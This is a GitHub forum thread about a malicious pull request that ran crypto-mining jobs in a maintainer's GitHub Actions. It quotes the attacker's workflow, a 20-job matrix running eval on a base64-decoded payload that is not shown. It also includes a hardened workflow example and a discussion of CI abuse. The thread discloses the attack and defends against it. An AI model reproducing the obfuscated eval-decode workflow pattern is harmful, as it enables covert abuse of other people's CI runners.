Crypto-mining attack in my github actions through pull request

Hello,

Some days ago, a github user attacked one of my github repositories with a malicious pull request to trigger crypto-mining in my github actions. The pull request was opened/closed multiple times and each action was starting up to 20 sub-jobs.

I was alerted very quickly and stopped the jobs and closed the PR immediately.

I wrote a blog post that relates the whole story and gives full details: Github Actions mining attack through Pull Request

It is similar to Massive Cryptomining Campaign Abusing GitHub (…) but differs completely in the implementation.

I already reported it to GitHub through the contact form.

The malicious action looked like this:

name: Test
on: [pull_request]
jobs:
  test:
    name: Fetch
    runs-on: ubuntu-latest
    container: ubuntu:20.10
    env:
      DEBIAN_FRONTEND: noninteractive
    strategy:
      fail-fast: false
      matrix:
        runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]
    steps:
      - run: |
          eval "$(echo "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" | base64 -d)"
2 Likes
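As an added example (not the original poster's workflow and not taken from GitHub's documentation), here is a hardened counterpart to the workflow above, assuming a repository whose tests run with `make test`. Because a `pull_request` workflow is read from the PR's own head branch, a contributor's newly added workflow file is not bound by any of these settings, so the repository-level setting that requires approval before fork PRs run workflows remains the control that addresses the pattern in this thread.

```yaml
# Added example, not the original poster's workflow. Assumes tests run via `make test`.
name: Test
on: [pull_request]

# Give the job's GITHUB_TOKEN read-only access instead of the default write scopes.
permissions:
  contents: read

# Allow one in-flight run per PR branch: re-opening or re-pushing cancels the
# previous run, so an open/close loop cannot pile up parallel jobs.
concurrency:
  group: test-${{ github.head_ref || github.ref }}
  cancel-in-progress: true

jobs:
  test:
    name: Run tests
    runs-on: ubuntu-latest
    # Skip the job for PRs coming from forks; a maintainer can still run the
    # tests after reviewing the change.
    if: github.event.pull_request.head.repo.full_name == github.repository
    # Bound the runtime of any single job so a runaway process is killed
    # instead of consuming runner minutes until the 6-hour default limit.
    timeout-minutes: 15
    steps:
      - uses: actions/checkout@v4
      - run: make test
```

The weak settings in the original are the unbounded 20-entry matrix with no concurrency group or timeout; the `if` guard and read-only token further limit what a workflow can do with the repository.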

:wave: Welcome!

I’m sorry that happened. I’ve had a look and your ticket has been worked on by a couple of different teams. That sometimes delays a reply, but I can assure you they’re handling it!

1 Like

I got an answer from support; they confirmed that these kinds of attacks happen and that they took countermeasures quickly, even before I reported it (it was they who flagged and removed the nasty user and pull request).

Thank you @canuckjacq and all!

4 Likes

Thanks for the update and I’m really glad to hear that. I know these attacks can be alarming.

2 Likes

Glad it got resolved and that it was a proactive response.

This is a good reminder of what the interface of our modern CI is, the risk that it poses, and why we need to safeguard it. CI systems are Remote Code Execution as a service, nothing more, nothing less. It has the (useful) side effect of being a great way to execute tests; that is the common use case rather than the only one.

1 Like

I’m confused how this is an “attack”, or at least who it’s attacking.

GitHub, in their, uh, infinite wisdom, seems to have given the whole internet the ability to submit a shell script that they will run on an arbitrary number of VMs, just by making a free, anonymous account and submitting a PR to any repo. As far as I can tell, the script doesn’t have access to modify your repo or use its / your credentials. It’s just doing what GitHub advertises: running arbitrary code in response to an action. (That code happens to be dumb and wasteful, but GH doesn’t prevent that.)

It’s primarily an attack against Github, wasting their resources for creating cryptocurrency. The effect on the repository owner is more like spam, but that’s bad enough already.

3 Likes

It would be nice to exclude folders like .github from pull requests opened by non-collaborators.

2 Likes